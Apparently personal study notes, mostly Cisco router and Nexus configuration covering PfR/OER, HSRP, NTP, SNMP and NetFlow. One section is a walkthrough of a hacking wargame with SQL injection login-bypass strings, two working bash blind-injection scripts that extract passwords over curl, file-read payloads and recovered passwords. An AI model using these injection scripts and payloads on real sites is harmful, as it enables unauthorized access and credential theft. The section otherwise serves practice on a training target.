# Rotary groups and autocommand


R2(config)# ip ssh port 2000 rotary 2
R2(config)# line vty 0 1
R2(config-line)# rotary 1
R2(config)# line vty 2 3
R2(config-line)# rotary 2
R2(config-line)# transport input ssh
R2(config)# line vty 4 5
R2(config-line)# no login
R2(config-line)# rotary 3
R2(config-line)# autocommand  ssh -l ruser 192.168.12.1
R2# show control-plane host open-ports
R1# telnet 192.168.12.2 3001
R1# ssh -l ruser -p 2002 192.168.12.2
R1# telnet 192.168.12.2 3003

# Cisco PfR/OER

Cisco Performance Routing (PfR), formely known as Optimized Edge Routing (OER), allows routing based on destination prefix and application type.
PfR is designed to make the best use of available bandwidth, but it does not solve the problem of over-subscribed bandwidth.

Stages

- Learn
- Measure
- Apply Policy
- Enforce
- Verify

Learn

BRs learn interesting applications (traffic classes) using destination prefix with or without port, dscp, source prefix or even application using NBAR.
This profiling process can be automatic or configured manually.

- Automatic

MC(config)# key chain key1
MC(config-keychain)# key 1
MC(config-keychain-key)# key-string cisco
MC(config)# oer master
MC(config-oer-mc)# logging
MC(config-oer-mc)# border 10.0.1.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface fa0/1 external
MC(config-oer-mc)# border 10.0.2.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface fa0/1 external
MC(config-oer-mc)# learn
MC(config-oer-mc-learn)# throughput
MC(config-oer-mc-learn)# monitor 1
MC(config-oer-mc-learn)# periodic 0

- Manual

MC(config)# ip prefix-list FILTERBRANCH1 seq 10 permit 10.1.1.0/24
MC(config)# ip prefix-list FILTERBRANCH1 seq 20 permit 10.1.2.0/24
MC(config)# ip prefix-list FILTERBRANCH2 seq 10 permit 10.2.1.0/24
MC(config)# ip prefix-list FILTERBRANCH2 seq 20 permit 10.2.2.0/24
MC(config)# ip access-list extended MYAPP
MC(config-ext-nacl)# permit tcp any any eq 21
MC(config)# oer-map MYMAP 10
MC(config-oer-map)#  match traffic-class application telnet prefix-list FILTERBRANCH1
MC(config-oer-map)#  set mode select-exit good
MC(config-oer-map)#  set delay threshold 2000
MC(config-oer-map)#  set mode route control
MC(config-oer-map)#  set mode monitor both
MC(config-oer-map)#  no set resolve delay
MC(config-oer-map)#  set active-probe echo 10.1.1.10 ! IP SLA probe
MC(config)# oer-map MYMAP 20
MC(config-oer-map)# match traffic-class application http prefix-list FILTERBRANCH2
MC(config-oer-map)# set mode select-exit good
MC(config-oer-map)# set delay threshold 2000
MC(config-oer-map)# set mode route control
MC(config-oer-map)# set mode monitor both
MC(config-oer-map)# no set resolve delay
MC(config)# oer-map MYMAP 30
MC(config-oer-map)# traffic-class access-list MY_APP filter FILTERBRANCH2
MC(config-oer-map)# set mode select-exit good
MC(config-oer-map)# set delay threshold 2000
MC(config-oer-map)# set mode route control
MC(config-oer-map)# set mode monitor both
MC(config-oer-map)# no set resolve delay
MC(config-oer-map)# set active-probe echo 10.1.3.10 ! IP SLA probe
MC(config)# oer master
MC(config-oer-mc)# policy-rules MYMAP
MC(config-oer-mc)# logging
MC(config-oer-mc)# border 10.1.0.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface fa0/1 external
MC(config-oer-mc)# border 10.2.0.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface fa0/1 external

Measure

Collect traffic class statistics.
The monitor modes are: passive (Netflow), active (IP SLA), both (Netflow + IP SLA), fast and special (cat6k).

Apply Policy

Determine whether traffic class is out of policy and if an alternate path can meet the policy requirements.
Traffic class states:

- Default: Prefix manually configured but has not been determined to be out-of-policy ~ shutdown
- InPolicy: The prefix meets its respective policy.
- Out-of-Policy: The prefix fails its respective policy.
- HoldDown: Is a period of wait to avoid erratic behaviour after a prefix has been changed.

Enforce

Re-route traffic injecting static routes, BGP local preference or using PBR.
Two modes:

- Observe mode

Default mode. MC monitors traffic classes and exit links.

- Control mode

Configured using the mode route control command. MC coordinates information from BRs and changes the routing process.

Verify

Check the new route match the policy.
Use the logging command to log PfR state changes.
To display PfR information about prefixes or routes use:
show oer master prefix
show oer border routes ?

Laboratory

Topology:

R1-R2-R3-R5
R2-R4-R5

R2 is the MC.
R3 and R4 are the BRs.

Routing configuration:

R1(config)# interface fa0/0
R1(config-if)# ip address 192.168.12.1 255.255.255.0
R1(config)# ip route 0.0.0.0 0.0.0.0 192.168.12.2
R2(config)# interface lo2
R2(config-if)# ip address 2.2.2.2 255.255.255.255
R2(config)# interface fa0/0
R2(config-if)# ip address 192.168.23.2 255.255.255.0
R2(config)# interface fa0/1
R2(config-if)# ip address 192.168.24.2 255.255.255.0
R2(config)# interface fa1/0
R2(config-if)# ip address 192.168.12.2 255.255.255.0
R2(config)# router bgp 10
R2(config-router)# network 2.2.2.2 mask 255.255.255.255
R2(config-router)# network 192.168.12.0
R2(config-router)# network 192.168.23.0
R2(config-router)# network 192.168.24.0
R2(config-router)# neighbor 192.168.23.3 remote-as 10
R2(config-router)# neighbor 192.168.24.4 remote-as 10
R3(config)# interface lo3
R3(config-if)# ip address 3.3.3.3 255.255.255.255
R3(config)# interface fa0/0
R3(config-if)# ip address 192.168.23.3 255.255.255.0
R3(config)# interface sel1/0
R3(config-if)# ip address 192.168.35.3 255.255.255.0
R3(config)# router bgp 10
R3(config-router)# network 3.3.3.3 mask 255.255.255.255
R3(config-router)# network 192.168.23.0
R3(config-router)# network 192.168.35.0
R3(config-router)# neighbor 192.168.23.2 remote-as 10
R3(config-router)# neighbor 192.168.35.5 remote-as 20
R4(config)# interface lo4
R4(config-if)# ip address 4.4.4.4 255.255.255.255
R4(config)# interface fa0/0
R4(config-if)# ip address 192.168.45.4 255.255.255.0
R4(config)# interface fa0/1
R4(config-if)# ip address 192.168.24.4 255.255.255.0
R4(config)# router bgp 10
R4(config-router)# network 4.4.4.4 mask 255.255.255.255
R4(config-router)# network 192.168.24.0
R4(config-router)# network 192.168.45.0
R4(config-router)# neighbor 192.168.24.2 remote-as 10
R4(config-router)# neighbor 192.168.45.5 remote-as 20
R5(config)# interface lo5
R5(config-if)# ip address 5.5.5.5 255.255.255.255
R5(config)# interface fa0/0
R5(config-if)# ip address 192.168.45.5 255.255.255.0
R5(config)# interface se1/0
R5(config-if)# ip address 192.168.35.5 255.255.255.0
R5(config)# router bgp 20
R5(config-router)# network 5.5.5.5 mask 255.255.255.255
R5(config-router)# network 192.168.35.0
R5(config-router)# network 192.168.45.0
R5(config-router)# neighbor 192.168.35.3 remote-as 10
R5(config-router)# neighbor 192.168.45.4 remote-as 10

OER configuration:

R3(config)# key chain MYKEY
R3(config-keychain)# key 1
R3(config-keychain-key)# key-string OER
R3(config)# oer border
R3(config-oer-br)# logging
R3(config-oer-br)# local loopback 3
R3(config-oer-br)# master 2.2.2.2 key-chain MYKEY
R4(config)# key chain MYKEY
R4(config-keychain)# key 1
R4(config-keychain-key)# key-string OER
R4(config)# oer border
R4(config-oer-br)# logging
R4(config-oer-br)# local loopback 4
R4(config-oer-br)# master 2.2.2.2 key-chain MYKEY
R2(config)# key chain MYKEY
R2(config-keychain)# key 1
R2(config-keychain-key)# key-string OER
R2(config)# oer master
R2(config-oer-mc)# policy-rules CRITICAL-APP
R2(config-oer-mc)# logging
R2(config-oer-mc)# border 3.3.3.3 key-chain MYKEY
R2(config-oer-mc-br)# interface fa0/0 internal
R2(config-oer-mc-br)# interface se1/0 external
R2(config-oer-mc)# border 4.4.4.4 key-chain MYKEY
R2(config-oer-mc-br)# interface fa0/1 internal
R2(config-oer-mc-br)# interface fa0/0 external
R2# show oer master
R2(config)# ip prefix-list CRITICAL seq 10 permit 5.5.5.5/32
R2(config)# oer-map CRITICAL-APP 10
R2(config-oer-map)# match traffic-class prefix-list CRITICAL
R2(config-oer-map)# set periodic 90 ! Try to find a better path every 90 seconds
R2(config-oer-map)# set mode select-exit best ! Try to find the best exit
R2(config-oer-map)# set backoff 90 90 ! Time to wait for a OOPolicy prefix
R2(config-oer-map)# set holddown 90
R2(config-oer-map)# set delay threshold 50 ! Maximum delay time
R2(config-oer-map)# set mode route control ! Control mode
R2(config-oer-map)# set mode monitor active
R2(config-oer-map)# set resolve delay priority 1 variance 1
R2(config-oer-map)# set active-probe echo 5.5.5.5 ! From BRs
R2# show oer master policy
R2# show oer master prefix
R2# show ip bgp 5.5.5.5/32 ! Look for localpref

Debugging and delay modification:

R3# debug oer border active-probes
R4# debug oer border active-probes
R3(config)# int s1/0
R3(config-if)# traffic-shape rate 8000 1000 0 0

References

PfR:Technology_Overview

# Flack wargame

Location

.::|[ FLACK ]|::.

Login bypass

- Level 1

' or 1=1 #
level1

or

' or '1'='1
' or '1'='1

- Level 2

' or 1=1) #
level2

or

' or '1'='1
' or '1'='1

- Level 3

admin') #
level3

- Level 4

# cat bypass-level4.sh 
#!/bin/bash

url='http://flack.hkpco.kr/login/level4/index.php'
string='Mail server error'
pass=""

for length in `seq 1 50`; do
 match=`curl -s -F "fuser=johnwayne' and length(pass)=$length #" $url | grep "$string"`
 if [ "$match" != "" ]; then break; fi
done
echo "Password length = $length"

for i in `seq 1 $length`; do
 for char in {{a..z},{0..9},{A..Z}}; do 
  match=`curl -s -F "fuser=johnwayne' and substring(pass,$i,1)='$char" $url | grep "$string"`
  if [ "$match" != "" ]; then break; fi
 done
 pass="$pass$char"
 echo "pass[$i]='$char'"
done

echo "pass='$pass'"

johnwayne
drjgxpp

- Level 5

' union select md5('level5') #
level5

Other/Blind

- Level 1

http://flack.hkpco.kr/other/level1/members.php?uid=1 or id>1 order by name
http://flack.hkpco.kr/other/level1/members.php?uid=4 order by password
http://flack.hkpco.kr/other/level1/members.php?uid=4 order by pass
http://flack.hkpco.kr/other/level1/members.php?uid=4 and length(pass)=1

# cat other-level1.sh
#!/bin/bash

url='http://flack.hkpco.kr/other/level1/members.php?uid=4'
string='jumper'
pass=""

for length in `seq 1 50`; do
 match=`curl -s "$url and length(pass)=$length" | grep "$string"`
 if [ "$match" != "" ]; then break; fi
done
echo "Password length = $length"

for i in `seq 1 $length`; do
 for char in {{a..z},{0..9},{A..Z}}; do
  decimal=`echo -n $char | od -An -d | tr -d ' '`
  match=`curl -s "$url and substring(pass,$i,1)=char($decimal)" | grep "$string"`
  if [ "$match" != "" ]; then break; fi
 done
 pass="$pass$char"
 echo "pass[$i]='$char'"
done

echo "pass='$pass'"

jumper
mehijo123

- Level 3

http://flack.hkpco.kr/style.css

# echo -n /tmp/a000.temp | od -t x1 -An | sed 's/ /,0x/g'
# echo -n /tmp/a000.temp | od -An -t u1 | sed 's/  / /g' | tr ' ' ','

select load_file(char(0x2f,0x74,0x6d,0x70,0x2f,0x61,0x30,0x30,0x30,0x2e,0x74,0x65,0x6d,0x70));

or

select load_file(char(47,116,109,112,47,97,48,48,48,46,116,101,109,112));

batman
skoda>batmobile

# IP Forwarding

Process Switching, Fast Switching, and Cisco Express Forwarding

With fast switching, the first packet is process switched. The router adds an entry to the fast-switching cache (route cache). The cache has the destination IP address, next-hop information, and data link header information. Future packets with the same destination IP match the cache entry. The cache entries are timed out quickly.
CEF optimizes the route lookup using the Forwarding Information Base (FIB) and adjacency table. FIB contains information about know routes in the RIB and points to entries in the adjancency table. The adjacency table list the outgoing interface and the data link information. This information is precomputed and stored in Ternary Content Addressable Memory (TCAM).

Frame Relay Inverse ARP

With InARP, routers know the DLCI and need to learn the IP address.
A Frame Relay multipoint subinterface uses received InARP information.

Router1(config)# interface s0/0
Router1(config-if)# encapsulation frame-relay
Router1(config)# interface s0/0.1 multipoint
Router1(config-if)# ip address 192.168.0.1 255.255.255.0
Router1(config-if)# frame-relay interface-dlci 200
Router1(config-if)# frame-relay interface-dlci 300
Router1# show frame-relay map

A Frame Relay point-to-point subinterface ignores InARP information because any other IP hosts can be reached only by the single DLCI.

Router2(config)# interface s0/0
Router2(config-if)# encapsulation frame-relay
Router2(config)# interface Serial0/0.2 point-to-point
Router2(config-if)# 192.168.0.2 255.255.255.0
Router2(config-if)# frame-relay interface-dlci 100

A Frame Relay point-to-point interface does not receive InARP information because they only flow across a VC. The solution is to add the frame-relay map command to reach the not directly connected router.

Router3(config)# interface s0/0
Router3(config-if)# encapsulation frame-relay
Router3(config-if)# 192.168.0.3 255.255.255.0
Router3(config-if)# frame-relay interface-dlci 100
Router3(config-if)# frame-relay map ip 192.168.0.2 100 broadcast

Disabling InARP

InARP can be disabled on multipoint interfaces and physical interfaces using no frame-relay inverse-arp.
The router stops sending InARP messages and ignores received InARP messages too.

Classless and Classful Routing

Classless routing: when a default route exists and no specific match is made, the default route is used.
Classful routing: when a default route exists and the class A, B or C network does not exist in the routing table, the default route is used. If a class A, B or C network exists, but the packet does not match any of the existing subnets of that classful network, the default route is not used and the packet is discarded.

Policy Routing

set ip next-hop 10.1.1.1 10.1.1.2: Forwards to the first addres in the list for which the associated interface is up.
set ip default next-hop 10.1.1.1 10.1.1.2: Same logic, except policy routing first attempts to route based on the routing table.
set interface s0/0 s1/0: Forwards packets using the first interface in the list that is up.
set default interface s0/0 s1/0: Same logic, except policy routing first attempts to route based on the routing table.
ToS (8b) = [7-5b] IP precedence + [4b] Delay + [3b] Throughput + [2b] Reliability + [1b] Monetary cost + [0] Must be 0.
set ip precedence number|name: Sets bits 7,6,5 of the ToS
set ip tos number: Sets all 8 bits of the ToS

Router(config)# access-list 100 permit tcp any any eq 22
Router(config)# route-map MYROUTEMAP permit 10
Router(config-route-map)# match ip address 100
Router(config-route-map)# set ip next-hop 10.1.1.1
Router(config)# route-map MYROUTEMAP permit 20
Router(config-route-map)# set ip next-hop 10.1.1.2

Optimized Edge Routing and Performance Routing

OER came first, and Cisco has extended its functionality and renamed it PfR or PIRO (Protocol-Independent Routing Optimization).
OER was created to more optimally route traffic than routing protocols and takes into account:

- Packet loss
- Response time
- Path availability
- Traffic load distribution

PfR leans about network performance using IP SLA (active monitoring) and/or Netflow (passive monitoring).
Stages:

- Learn
- Measure
- Apply Policy
- Enforce
- Verify

Requeriments:

- CEF enabled
- IGP/BGP working
- Does not support MPLS and iBGP
- Uses redistribution of static routes with a tag

Device Roles in PfR

- Master Controller (MC)

Configured using the oer master command.
Learns specified information from the BRs and makes configuration decisions.

- Border Router (BR)

Configured using the oer border command.
A single router can act as both MC and BR.

MC High Availability and Failure Considerations

BR and MC maintain communication using keepalives. If keepalives from the MC stop, the BR removes any PfR information.
For high availability configure more than one MC.

PfR configuration

MC(config)# key-chain key1
MC(config-keychain)# key1
MC(config-keychain-key)# key-string pfr
MC(config)# oer master
MC(config-oer-mc)# logging
MC(config-oer-mc)# mode route control
MC(config-oer-mc)# max prefix total 1000
MC(config-oer-mc)# backoff 90 3000 300
MC(config-oer-mc)# learn
MC(config-oer-mc-learn)# delay
MC(config-oer-mc-learn)# monitor period 5
MC(config-oer-mc-learn)# periodic interval 15
MC(config-oer-mc)# border 10.1.0.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface se0/0 external
MC(config-oer-mc-br-if)# max-xmit-utilization absolute 1500
MC(config-oer-mc-br-if)# cost-minimization fixed fee 1000
MC(config-oer-mc)# border 10.2.0.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface se0/0 external
MC(config-oer-mc-br-if)# max-xmit-utilization absolute 1000
MC(config-oer-mc-br-if)# cost-minimization fixed fee 800
BR1(config)# key-chain key1
BR1(config-keychain)# key1
BR1(config-keychain-key)# key-string pfr
BR1(config)# oer border
BR1(config-oer-br)# master 10.0.0.1 key-chain key1
BR1(config-oer-br)# local fa0/0
BR1(config-oer-br)# active-probe address source interface fa0/0
BR2(config)# key-chain key1
BR2(config-keychain)# key1
BR2(config-keychain-key)# key-string pfr
BR2(config)# oer border
BR2(config-oer-br)# master 10.0.0.1 key-chain key1
BR2(config-oer-br)# local fa0/0
BR2(config-oer-br)# active-probe address source interface fa0/0

GRE Tunnels

Passenger protocol is encapsulated into the transport protocol.
Multicast is a good example of traffic tunneled from one router to another using unicast packets.

R1(config)# int tu0
R1(config-if)# ip address 10.1.3.1 255.255.255.0
R1(config-if)# tunnel source FastEthernet0/0
R1(config-if)# tunnel destination 192.168.23.3
R1(config-if)# tunnel mode gre
R1(config)# int fa0
R1(config-if)# ip address 192.168.12.1 255.255.255.0
R1(config)# ip route 0.0.0.0 0.0.0.0 192.168.12.2
R3(config)# int tu0
R3(config-if)# ip address 10.1.3.3 255.255.255.0
R3(config-if)# tunnel source FastEthernet0/0
R3(config-if)# tunnel destination 192.168.12.1
R3(config-if)# tunnel mode gre
R3(config)# int fa0
R3(config-if)# ip address 192.168.23.3 255.255.255.0
R3(config)# ip route 0.0.0.0 0.0.0.0 192.168.23.2

# Cisco Nexus

Some Commands

- Hardware

NX-7K-1# show inventory ! display chassis components
NX-7K-1# show redundancy status ! determine active supervisor
NX-7K-1# show module ! display individual modules
NX-7K-1# show environment ! display clock, fan, temperature, power
NX-7K-1(config)# power redundancy-mode ?

- System utilization

NX-7K-1# show system resources

- Piping

NX-7K-1# show run | ? ! last, tail, egrep, no-more, ...

- Running config

NX-7K-1# show running-config ?
NX-7K-1# show running-config all ! display configuration with defaults

- Interface ranges

NX-7K-1(config)# int e2/4, e3/1-2 ! no range command

- Shared or dedicated

NX-7K-1(config)# int e2/1, e2/3, e2/5, e2/7
NX-7K-1(config-if)# shutdown
NX-7K-1(config)# int e2/1
NX-7K-1(config-if)# rate-mode dedicated
NX-7K-1(config-if)# no shutdown

- Licencing

NX-7K-1# show license host-id
NX-7K-1# install license bootflash: NX7K-1234.lic
NX-7K-1# show license usage

- Modules

NX-7K-1# reload module ?
NX-7K-1# attach module ?

Virtual Device Context (VDC)

Four VDCs: Default VDC1 and 3 additional VDCs.

NX-7K-1(config)# vdc VDC2 id 2
NX-7K-1(config-vdc)# allocate interface e3/1-24
NX-7K-1(config)# vdc VDC3 id 3
NX-7K-1(config-vdc)# allocate interface e3/25-48
NX-7K-1# show vdc
NX-7K-1# show vdc membership
NX-7K-1# show run vdc
NX-7K-1# switchto vdc VDC2
NX-7K-1-VDC2# switchback
NX-7K-1#

Virtual Port Channel (VPC)

NX-7K-1(config)# feature vpc
NX-7K-1(config)# vpc domain 10
NX-7K-1(config-domain)# peer-switch
NX-7K-1(config-domain)# peer-keepalive destination 10.10.10.2
NX-7K-1# show vpc role
NX-7K-1# show vpc peer-keepalive
NX-7K-1(config)# interface port-channel 10
NX-7K-1(config-if)# switchport mode trunk
NX-7K-1(config-if)# switchport trunk allowed vlan 100-105 ! vPC VLANs
NX-7K-1(config-if)# switchport trunk native 100
NX-7K-1(config-if)# vpc peer-link
NX-7K-1# show vpc brief
NX-7K-1(config)# interface ethernet 1/1-2
NX-7K-1(config-if-range)# channel-group 11 mode active
NX-7K-1(config)# interface port-channel 11
NX-7K-1(config-if)# switchport mode trunk
NX-7K-1(config-if)# vpc 11
NX-7K-2(config)# feature vpc
NX-7K-2(config)# vpc domain 10
NX-7K-2(config-domain)# peer-switch
NX-7K-2(config-domain)# peer-keepalive destination 10.10.10.1
NX-7K-2(config)# interface port-channel 10
NX-7K-2(config-if)# switchport mode trunk
NX-7K-2(config-if)# switchport trunk allowed vlan 100-105 ! vPC VLANs
NX-7K-2(config-if)# switchport trunk native 100
NX-7K-2(config-if)# vpc peer-link
NX-7K-2(config)# interface ethernet 2/7-8
NX-7K-2(config-if-range)# channel-group 11 mode active
NX-7K-2(config)# interface port-channel 11
NX-7K-2(config-if)# switchport mode trunk
NX-7K-2(config-if)# vpc 11
NX-7K-2# show vpc consistency-parameters global

Fabric EXtenders (FEX) ~ Nexus 2000 series

Deployment models:

- Static pinning (Nexus 5000 series)

NX-5K-1(config)# feature fex
NX-5K-1(config)# fex 100
NX-5K-1(config-fex)# pinning max-links 4
NX-5K-1(config)# int ethernet 1/1-4
NX-5K-1(config-if)# switchport mode fex-fabric
NX-5K-1(config-if)# fex associate 100
NX-5K-1# show fex 100
NX-5K-1# show fex detail
NX-5K-1# show module fex

- Dynamic pinning (Nexus 5000 and 7000 series)

NX-5K-1(config)# feature fex
NX-5K-1(config)# fex 101
NX-5K-1(config-fex)# pinning max-links 1
NX-5K-1(config)# int ethernet 1/9-12
NX-5K-1(config-if)# switchport mode fex-fabric
NX-5K-1(config-if)# channel-group 11
NX-5K-1(config)# int port-channel 11
NX-5K-1(config-if)# fex associate 101
NX-5K-1# show int port-channel 11 fex-intf
NX-5K-1# show module fex

- vPC (Nexus 5000 series)

NX-5K-1(config)# feature fex
NX-5K-1(config)# fex 102
NX-5K-1(config-fex)# pinning max-links 1
NX-5K-1(config)# int ethernet 1/17-20
NX-5K-1(config-if)# switchport mode fex-fabric
NX-5K-1(config-if)# channel-group 12
NX-5K-1(config)# feature vpc
! vPC domain configuration
NX-5K-1(config)# int port-channel 12
NX-5K-1(config-if)# vpc 12
NX-5K-1(config-if)# fex associate 102
NX-5K-1# show int port-channel 12 fex-intf
NX-5K-1# show module fex

Configuration Rollback

NX-7K-1# checkpoint CP1 description First checkpoint
NX-7K-1# show checkpoint summary
NX-7K-1# rollback running-config checkpoint CP1

Role-Based Access Control (RBAC)

NX-7K-1(config)# role name L3-admin
NX-7K-1(config-role)# rule 1 permit read-write feature-group L3
NX-7K-1(config-role)# vlan policy deny
NX-7K-1(config-role-vlan)# permit vlan 1-100
NX-7K-1(config-role)# vrf policy deny
NX-7K-1(config-role-vlan)# permit vrf VRF1
NX-7K-1(config-role-vlan)# permit vrf VRF2 
NX-7K-1# show role 

Ethanalyzer ~ a wrapper over tshark

NX-7K-1# ethanalyzer local interface inband brief limit-captured-frames 10
NX-7K-1# ethanalyzer local interface inband limit-captured-frames 1

VRF

NX-7K-1# show ip int brief ! default VRF
NX-7K-1# show ip int brief vrf management
NX-7K-1# ping 10.1.1.1 vrf management
NX-7K-1# routing-context vrf management
NX-7K-1%management# ping 10.1.1.1
NX-7K-1%management# routing-context vrf default
NX-7K-1#

Config-sync

NX-7K-1# configure sync
NX-7K-1(config-sync)# switch-profile PROFILE1
NX-7K-2# configure sync
NX-7K-2(config-sync)# switch-profile PROFILE1
NX-7K-2(config-sync-sp)# import interface po10
NX-7K-2(config-sync-sp-import)# verify
NX-7K-2(config-sync-sp-import)# show switch-profile PROFILE1 buffer
NX-7K-2(config-sync-sp-import)# show switch-profile PROFILE1 status
NX-7K-2(config-sync-sp-import)# commit
NX-7K-1(config-sync-sp)# sync-peers destination 10.0.0.2
NX-7K-2(config-sync-sp)# sync-peers destination 10.0.0.1
NX-7K-2(config-sync-sp)# int po10
NX-7K-2(config-sync-sp-if)# spanning-gree port type edge trunk
NX-7K-2(config-sync-sp)# verify
NX-7K-2(config-sync-sp)# commit
NX-7K-2# show running-config switch-profile

In-Service Software Upgrade (ISSU)

NX-7K-2# show incompatibility system n7000.bin
NX-7K-2# install all kickstart n7000-kickstart.bin system n7000.bin
NX-7K-2# system switchover
NX-7K-1# show incompatibility system n7000.bin
NX-7K-1# install all kickstart n7000-kickstart.bin system n7000.bin
NX-7K-1# system switchover

# IP Services

RARP, BOOTP, and DHCP

- ARP

Ether.src = source MAC
Ether.dst = ff:ff:ff:ff:ff:ff
Ether.type = 0x0806
Sender MAC address = source MAC
Sender IP address = source IP
Target MAC address = 00:00:00:00:00:00
Target IP address = destination IP

- RARP

Ether.src = source MAC
Ether.dst = ff:ff:ff:ff:ff:ff
Ether.type = 0x0806
Sender MAC address = source MAC
Sender IP address = 0.0.0.0
Target MAC address = source MAC
Target IP address = 0.0.0.0

Request to find its own IP address.
A preconfigured RARP server is needed.

- BOOTP

Improves assignment features of RARP.
Uses UDP, so a router can relay BOOTP request to a centrally located BOOTP server.
A preconfigured BOOTP server is needed.
Supports the assignment of IP address, subnet mask, default gateway, DNS and IP address of a boot/image server.

DHCP

Building on the format of BOOTP protocols, dynamically assigns a variety of information, without requering predefinition of MAC addresses for each client.
The router relaying a DHCP request (ip helper-address) puts its own IP address in the gateway IP address (giaddr) field.

Router(config)# service dhcp
Router(config)# ip dhcp excluded-address 10.1.1.1 10.1.1.20
Router(config)# ip dhcp pool MYPOOL
Router(config-dhcp)# network 10.1.1.0 255.255.255.0
Router(config-dhcp)# domain-name lab.net
Router(config-dhcp)# dns-server 10.1.2.200
Router(config-dhcp)# default-router 10.1.1.1
Router(config-dhcp)# lease 0 0 20 ! days hours minutes


When the router forwards the DHCP request to the DHCP server changes the source IP to the broadcast subnet address.

*HSRP, VRRP, and GLBP

IP hosts can obtain a default gateway using DHCP, BOOTP, ICMP Router Discovery Protocol (IRDP), manual configuration or by running a routing protocol.

Hot Standby Router Protocol (HSRP):

- Virtual IP and virtual MAC active on the active router.
- Virtual IP must be different from any other IP address.
- Virtual MAC of 0000.0c07.acXX (XX is the hex HSRP group).
- Up to 255 HSRP groups per interface.
- Version 1 uses 224.0.0.2 and version 2 uses 224.0.0.102 (UDP destination port 1985).
- Standby routers listen for Hellos from the active router.
- The hello interval is 3 seconds and the dead interval is 10 seconds.
- Highest priority (by default 100) determines the active router.
- Preemption is disabled by default.
- Supports tracking.
- Supports clear-text and MD5 authentication.

When preemption is disabled:

- Although the priority of the active router goes below than the standby router, the active router mantains the active role.
- Only when the active router inferface fails the standby router takes the active role.

Router(config)# track 15 interface serial0/0 line-protocol
Router(config)# interface fastethernet0/0
Router(config-if)# standby 21 ip 10.1.1.21
Router(config-if)# standby 21 priority 105
Router(config-if)# standby 21 preempt
Router(config-if)# standby 21 track 15 decrement 6
Router(config-if)# standby 22 ip 10.1.1.22
Router(config-if)# standby 22 preempt
Router(config-if)# standby 22 track 15 decrement 12
Router# show standby fa0/0

Virtual Router Redundancy Protocol (VRRP):

- Virtual IP and virtual MAC active on the master router.
- Virtual IP may the same as one configured on a physical interface.
- Virtual MAC of 0000.5e00.01XX (XX is the the hex VRRP group).
- Up to 255 VRRP groups per interface.
- Uses 224.0.0.18 and IP protocol number 112.
- Backup routers listen for Hellos from the master router.
- The hello interval is 1 second and the dead interval is 3 seconds.
- Highest priority (by default 100) determines the master router.
- Preemption is enabled by default.
- Supports tracking.
- Supports clear-text and MD5 authentication.

Gateway Load Balancing Protocol (GLBP):

- Up to 4 active virtual forwarders (AVF).
- Virtual IP must be different from any other IP address.
- Virtual IP on the active virtual gateway (AVG) and load shares ARP requests between AVF.
- Individual virtual MAC on each AVF.
- Virtual MAC of 0007.b400.XXYY (XX is the hex GLBP group and YY the AVF number {01|02|03|04}).
- Up to 255 GLBP groups per interface.
- Uses 224.0.0.102 (UDP source/destination port 3222).
- Standby routers listen for Hellos from the active router.
- The hello interval is 3 seconds and the dead interval is 10 seconds.
- Preemption is disabled by default.
- Supports tracking.
- Supports clear-text and MD5 authentication.

NTP

Atomic clocks and GPS satellite transmissions provice a source of stratum 1.

Router(config)# ntp authentication-key 1 md5 MYKEY
Router(config)# ntp authenticate
Router(config)# ntp trusted-key 1
Router(config)# ntp master 7
Router(config)# ntp server 10.1.1.1
Router(config)# ntp peer 10.2.2.2 
Router(config)# int fa0/0
Router(config-if)# ntp broadcast
Router(config)# int fa0/1
Router(config-if)# ntp broadcast client
Router# show ntp status
Router# show ntp associations

SNMP

Uses UDP port 161 (traps use UDP port 162).

- SNMPv1: SMIv1, communities, MIB-I
- SNMPv2: SMIv2, communities removed, GetBulk and Inform messages, MIB-II
- SNMPv2c: Equivalent to SNMPv2, communities
- SNMPv3: Equivalent to SNMPv2, commnities, better security

SNMP Protocol Messages

Message   Version  Reply     Sent by  Purpose
Get       1        Response  Manager  Request single MIB variable
GetNext   1        Response  Manager  Request next single MIB variable
GetBulk   2        Response  Manager  Request consecutive MIB variables
Response  1        None      Agent    Reply with the information requested
Set       1        Response  Manager  Set a particular variable
Trap      1        None      Agent    Send unsolicited information
Inform    2        Response  Manager  Message between Managers (MIB exchange)

Syslog

Syslog uses UDP port 514.
logging buffered is disabled by default.
logging host 10.1.1.1 sets the syslog server.
logging trap debug limits the logging messages sent to the syslog server.

Web Cache Communication Protocol

Cisco protocol to allow transparent HTTP proxy.
Uses UDP port 2048.
WCCPv1 supports up to 32 content engines, the one with the lowest IP address is elected as the lead engine.
WCCPv2 (default version) supports:

- Supports TCP and UDP traffic other than HTTP traffic.
- Segmenting caching services provided by a caching cluster per protocol.
- Multicast, MD5 authentication, load distribution and transparent error handling.

Router(config)# ip wccp web-cache group-address 239.128.1.100 password MYPASS
Router(config)# interface fa0/0
Router(config-if)# ip wccp web-cache redirect in ! Enables redirection
Router(config)# interface fa0/1
Router(config-if)# ip wccp web-cache exclude in ! Disables redirection
Router(config)# access-list 1 permit 192.168.1.0 0.0.0.255
Router(config)# ip wccp web-cache group-list 1 ! List of content engines
Router(config)# access-list 2 permit 192.168.2.0 0.0.0.255
Router(config)# ip wccp web-cache redirect-list 2 ! List of redirected hosts

Implementing the Cisco IOS IP Service Level Agreement (IP SLA) Feature

Allows measuring:

- Delay (one way and round trip)
- Jitter
- Packet loss
- Packet sequencing
- Path (per hop)
- Connectivity (UDP echo, ICMP echo, TCP connect)
- Server download time
- Voice-quality metrics

IP SLA control protocol between the monitor and the responder uses UDP port 1967.

Responder(config)# ip sla responder
Monitor(config)# ip sla 1
Monitor(config-ip-sla)# udp-echo 192.168.12.1 1330
Monitor(config)# ip sla schedule 1 life forever start-time now
Monitor# show ip sla statistics 1

Implementing NetFlow

c6500(config)# interface fa0/0.10
c6500(config-if)# ip flow ingress ! Software-routed (MSFC)
c6500(config)# interface fa0/1
c6500(config-if)# ip route-cache flow ! Software-routed (MSFC)
c6500(config)# ip flow-export source lo0
c6500(config)# ip flow-export destination 10.1.1.1 9996
c6500(config)# ip flow-export version 5
c6500(config)# mls netflow ! Hardware-routed (PFC)
